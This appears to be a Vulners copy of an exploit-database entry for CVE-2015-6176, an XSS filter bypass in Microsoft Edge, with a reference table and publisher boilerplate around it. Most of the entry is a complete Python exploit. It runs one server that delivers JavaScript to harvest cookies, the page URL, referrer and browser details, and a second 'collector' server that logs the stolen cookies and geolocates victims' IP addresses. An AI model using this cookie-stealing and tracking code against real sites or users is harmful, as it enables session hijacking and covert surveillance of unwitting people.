Vulners
Lucene search
Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
 | The vulnerability of the Microsoft Edge browser, which allows a hacker to bypass the protection against cross-site scripting attacks | 28 Jan 201600:00 | – | bdu_fstec |
 | CVE-2015-6176 | 23 Jul 202521:02 | – | circl |
 | Microsoft Edge XSS Filter Bypass Vulnerability | 9 Dec 201500:00 | – | cnvd |
 | CVE-2015-6176 | 9 Dec 201511:00 | – | cve |
 | CVE-2015-6176 | 9 Dec 201511:00 | – | cvelist |
 | EUVD-2015-6119 | 7 Oct 202500:30 | – | euvd |
 | MS15-125: Cumulative Security Update for Microsoft Edge: December 8, 2015 | 8 Dec 201500:00 | – | mskb |
 | KLA10720 Multiple vulnerabilities in Microsoft Internet Explorer & Edge | 8 Dec 201500:00 | – | kaspersky |
 | CVE-2015-6176 | 9 Dec 201511:59 | – | nvd |
 | Microsoft Edge Multiple Vulnerabilities (3116184) | 5 Jan 201600:00 | – | openvas |
10
# Titles: Microsoft Edge Windows 10 Version 1511 - Cross Site Scripting (XSS)
# Author: nu11secur1ty
# Date: 2025-07-18
# Vendor: Microsoft
# Software: Microsoft Edge Browser
# Reference: https://www.cve.org/CVERecord?id=CVE-2015-6176
#!/usr/bin/python
# nu11secur1ty CVE-2015-6176
import http.server
import socketserver
import socket
import threading
from urllib import parse
import requests
import datetime
PORT = 8080
COLLECTOR_PORT = 9000
# HTML page with extended XSS exploit that sends lots of info via Image GET
to collector
HTML_CONTENT = b\\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>XSS Edge Bypass PoC</title>
<script>
window.onload = function() {
try {
var attackerServer = \\\"http://{LOCAL_IP}:{COLLECTOR_PORT}/collect\\\";
var cookies = document.cookie || \\\"\\\";
var url = window.location.href;
var referrer = document.referrer;
var language = navigator.language || \\\"\\\";
var platform = navigator.platform || \\\"\\\";
var timezone = Intl.DateTimeFormat().resolvedOptions().timeZone ||
\\\"\\\";
var screenRes = screen.width + \\\"x\\\" + screen.height;
var data = {
cookie: cookies,
url: url,
referrer: referrer,
language: language,
platform: platform,
timezone: timezone,
screen: screenRes
};
var query = Object.keys(data).map(function(k) {
return encodeURIComponent(k) + \\\"=\\\" +
encodeURIComponent(data[k]);
}).join(\\\"&\\\");
var img = new Image();
img.src = attackerServer + \\\"?\\\" + query;
} catch(e) {
console.error(\\\"Error sending data:\\\", e);
}
};
</script>
</head>
<body>
<h1 style=\\\"color:red;\\\">XSS Edge Bypass PoC</h1>
<p>If this alert appears, XSS is executed.</p>
</body>
</html>
\\\"\\\"\\\"
# Collector page with large sea picture and centered message (Unicode
allowed)
COLLECTOR_PAGE = \\\"\\\"\\\"<!DOCTYPE html>
<html lang=\\\"en\\\">
<head>
<meta charset=\\\"UTF-8\\\" />
<title>Collected</title>
<style>
body {
margin: 0;
background: url(\\\'
https://images.unsplash.com/photo-1506744038136-46273834b3fb?auto=format&fit=crop&w=1350&q=80\\\')
no-repeat center center fixed;
background-size: cover;
height: 100vh;
display: flex;
justify-content: center;
align-items: center;
color: white;
font-family: Arial, sans-serif;
font-size: 2em;
text-shadow: 2px 2px 5px rgba(0,0,0,0.7);
}
</style>
</head>
<body>
<div>Thank you for visiting the collector page </div>
</body>
</html>
\\\"\\\"\\\"
class ExploitHandler(http.server.SimpleHTTPRequestHandler):
def do_GET(self):
if self.path in (\\\'/\\\', \\\'/index.html\\\'):
content = HTML_CONTENT.replace(b\\\"{LOCAL_IP}\\\",
local_ip.encode()).replace(b\\\"{COLLECTOR_PORT}\\\",
str(COLLECTOR_PORT).encode())
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
class CollectorHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
parsed_path = parse.urlparse(self.path)
if parsed_path.path == \\\"/collect\\\":
query = parse.parse_qs(parsed_path.query)
cookie = query.get(\\\"cookie\\\", [\\\"\\\"])[0]
url = query.get(\\\"url\\\", [\\\"\\\"])[0]
referrer = query.get(\\\"referrer\\\", [\\\"\\\"])[0]
language = query.get(\\\"language\\\", [\\\"\\\"])[0]
platform = query.get(\\\"platform\\\", [\\\"\\\"])[0]
timezone = query.get(\\\"timezone\\\", [\\\"\\\"])[0]
screen = query.get(\\\"screen\\\", [\\\"\\\"])[0]
ip = self.client_address[0]
user_agent = self.headers.get(\\\"User-Agent\\\", \\\"Unknown\\\")
timestamp = datetime.datetime.now().strftime(\\\"%Y-%m-%d
%H:%M:%S\\\")
location = self.get_location(ip)
if cookie:
print(f\\\"[{timestamp}] [+] Collected cookie: {cookie}\\\")
print(f\\\" URL: {url}\\\")
print(f\\\" Referrer: {referrer}\\\")
print(f\\\" Language: {language}\\\")
print(f\\\" Platform: {platform}\\\")
print(f\\\" Timezone: {timezone}\\\")
print(f\\\" Screen Resolution: {screen}\\\")
print(f\\\" From IP: {ip}\\\")
print(f\\\" User-Agent: {user_agent}\\\")
print(f\\\" Location: {location}\\\")
print(\\\"-\\\" * 50)
# Save collected info to a file
with open(\\\"collected_data.log\\\", \\\"a\\\", encoding=\\\"utf-8\\\") as f:
f.write(f\\\"[{timestamp}] Cookie: {cookie}\\\\n\\\")
f.write(f\\\" URL: {url}\\\\n\\\")
f.write(f\\\" Referrer: {referrer}\\\\n\\\")
f.write(f\\\" Language: {language}\\\\n\\\")
f.write(f\\\" Platform: {platform}\\\\n\\\")
f.write(f\\\" Timezone: {timezone}\\\\n\\\")
f.write(f\\\" Screen Resolution: {screen}\\\\n\\\")
f.write(f\\\" IP: {ip}\\\\n\\\")
f.write(f\\\" User-Agent: {user_agent}\\\\n\\\")
f.write(f\\\" Location: {location}\\\\n\\\")
f.write(\\\"-\\\" * 50 + \\\"\\\\n\\\")
self.send_response(200)
self.send_header(\\\"Content-Type\\\", \\\"text/html; charset=utf-8\\\")
content = COLLECTOR_PAGE.encode(\\\'utf-8\\\')
self.send_header(\\\"Content-Length\\\", str(len(content)))
self.end_headers()
self.wfile.write(content)
else:
self.send_error(404)
def get_location(self, ip):
# Use free IP info service; fallback gracefully if no internet
try:
resp = requests.get(f\\\"https://ipinfo.io/{ip}/json\\\", timeout=3)
if resp.status_code == 200:
data = resp.json()
city = data.get(\\\"city\\\", \\\"\\\")
region = data.get(\\\"region\\\", \\\"\\\")
country = data.get(\\\"country\\\", \\\"\\\")
loc = data.get(\\\"loc\\\", \\\"\\\")
return f\\\"{city}, {region}, {country} (coords: {loc})\\\"
except Exception:
pass
return \\\"Location lookup failed or unavailable\\\"
def get_local_ip():
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
try:
s.connect((\\\"8.8.8.8\\\", 80))
ip = s.getsockname()[0]
except Exception:
ip = \\\"127.0.0.1\\\"
finally:
s.close()
return ip
def run_exploit_server():
with socketserver.TCPServer((\\\"\\\", PORT), ExploitHandler) as httpd:
print(f\\\"[*] Exploit server running at: http://
{local_ip}:{PORT}/index.html\\\")
httpd.serve_forever()
def run_collector_server():
with socketserver.TCPServer((\\\"\\\", COLLECTOR_PORT), CollectorHandler) as
httpd:
print(f\\\"[*] Collector server listening for stolen cookies at:
http://{local_ip}:{COLLECTOR_PORT}/collect\\\")
httpd.serve_forever()
if __name__ == \\\"__main__\\\":
local_ip = get_local_ip()
try:
print(f\\\"[*] Your server IP is: {local_ip}\\\")
exploit_thread = threading.Thread(target=run_exploit_server,
daemon=True)
exploit_thread.start()
run_collector_server()
except KeyboardInterrupt:
print(\\\"\\\\n[!] Shutting down servers. Goodbye!\\\")
```
# Video:
[href](https://www.youtube.com/watch?v=T2YLrFsvXOc)
# Source:
[href](
https://github.com/nu11secur1ty/CVE-mitre/tree/main/2025/CVE-2015-6176)
# Buy me a coffee if you are not ashamed:
[href](https://www.paypal.com/donate/?hosted_button_id=ZPQZT5XMC5RFY)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
22 Jul 2025 00:00Current
7.4High risk
Vulners AI Score7.4
CVSS 24.3
EPSS0.10826